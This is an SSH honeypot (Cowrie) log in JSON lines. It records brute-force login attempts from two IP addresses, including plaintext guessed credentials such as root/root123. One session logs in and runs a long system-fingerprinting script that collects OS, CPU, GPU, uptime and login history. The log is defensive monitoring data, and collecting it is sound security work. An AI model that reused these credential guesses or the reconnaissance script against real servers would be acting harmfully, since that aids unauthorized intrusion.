{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:50.659859Z","src_ip":"212.227.235.229","session":"aaff2f91f01e"}
{"eventid":"cowrie.login.failed","username":"*****","password":"*****","message":"login attempt [*****/*****] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:53.075081Z","src_ip":"212.227.235.229","session":"aaff2f91f01e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:54.319033Z","src_ip":"212.227.235.229","session":"aaff2f91f01e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51422,"dst_ip":"1.2.3.4","dst_port":22,"session":"44dae19202b1","protocol":"ssh","message":"New connection: 212.227.235.229:51422 (1.2.3.4:22) [session: 44dae19202b1]","sensor":"my-vps","timestamp":"2025-08-31T04:59:54.928327Z"}
{"eventid":"cowrie.session.closed","duration":"30.6","message":"Connection lost after 30.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:56.074051Z","src_ip":"212.227.125.160","session":"772c8586afee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:59:57.884391Z","src_ip":"212.227.235.229","session":"44dae19202b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:59:57.896498Z","src_ip":"212.227.235.229","session":"44dae19202b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36138,"dst_ip":"1.2.3.4","dst_port":22,"session":"431017a1d5ae","protocol":"ssh","message":"New connection: 212.227.235.229:36138 (1.2.3.4:22) [session: 431017a1d5ae]","sensor":"my-vps","timestamp":"2025-08-31T05:00:00.700624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:00:00.701485Z","src_ip":"212.227.235.229","session":"431017a1d5ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:00:00.829795Z","src_ip":"212.227.235.229","session":"431017a1d5ae"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"12qwaszx","message":"login attempt [jenkins/12qwaszx] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:01.390110Z","src_ip":"212.227.235.229","session":"431017a1d5ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50230,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f223bbe6626","protocol":"ssh","message":"New connection: 212.227.125.160:50230 (1.2.3.4:22) [session: 0f223bbe6626]","sensor":"my-vps","timestamp":"2025-08-31T05:00:01.578840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:00:02.194137Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:00:02.195465Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:02.521889Z","src_ip":"212.227.235.229","session":"431017a1d5ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46766,"dst_ip":"1.2.3.4","dst_port":22,"session":"da3c24264808","protocol":"ssh","message":"New connection: 212.227.235.229:46766 (1.2.3.4:22) [session: da3c24264808]","sensor":"my-vps","timestamp":"2025-08-31T05:00:02.879985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:00:02.889066Z","src_ip":"212.227.235.229","session":"da3c24264808"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:00:03.133576Z","src_ip":"212.227.235.229","session":"da3c24264808"}
{"eventid":"cowrie.login.failed","username":"stserver","password":"stserver","message":"login attempt [stserver/stserver] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:04.132628Z","src_ip":"212.227.235.229","session":"da3c24264808"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:00:04.891138Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:05.386321Z","src_ip":"212.227.235.229","session":"da3c24264808"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:00:06.058513Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.063338Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.063824Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.064582Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.065296Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.065839Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.066514Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.067263Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.067647Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.068095Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.068464Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.068891Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.069227Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.653329Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.654276Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:06.655152Z","src_ip":"212.227.125.160","session":"0f223bbe6626"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:12.245903Z","src_ip":"212.227.235.229","session":"44dae19202b1"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:14.930555Z","src_ip":"212.227.235.229","session":"44dae19202b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45314,"dst_ip":"1.2.3.4","dst_port":22,"session":"65a0fefe35c0","protocol":"ssh","message":"New connection: 212.227.235.229:45314 (1.2.3.4:22) [session: 65a0fefe35c0]","sensor":"my-vps","timestamp":"2025-08-31T05:00:16.086654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T05:00:16.210401Z","src_ip":"212.227.235.229","session":"65a0fefe35c0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T05:00:16.349441Z","src_ip":"212.227.235.229","session":"65a0fefe35c0"}
{"eventid":"cowrie.login.failed","username":"vyatta","password":"vyatta","message":"login attempt [vyatta/vyatta] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:17.499698Z","src_ip":"212.227.235.229","session":"65a0fefe35c0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:18.893857Z","src_ip":"212.227.235.229","session":"65a0fefe35c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48892,"dst_ip":"1.2.3.4","dst_port":22,"session":"8856983fbe5a","protocol":"ssh","message":"New connection: 212.227.125.160:48892 (1.2.3.4:22) [session: 8856983fbe5a]","sensor":"my-vps","timestamp":"2025-08-31T05:00:20.352248Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43372,"dst_ip":"1.2.3.4","dst_port":22,"session":"be6b739c2c78","protocol":"ssh","message":"New connection: 212.227.235.229:43372 (1.2.3.4:22) [session: be6b739c2c78]","sensor":"my-vps","timestamp":"2025-08-31T05:00:23.205072Z"}
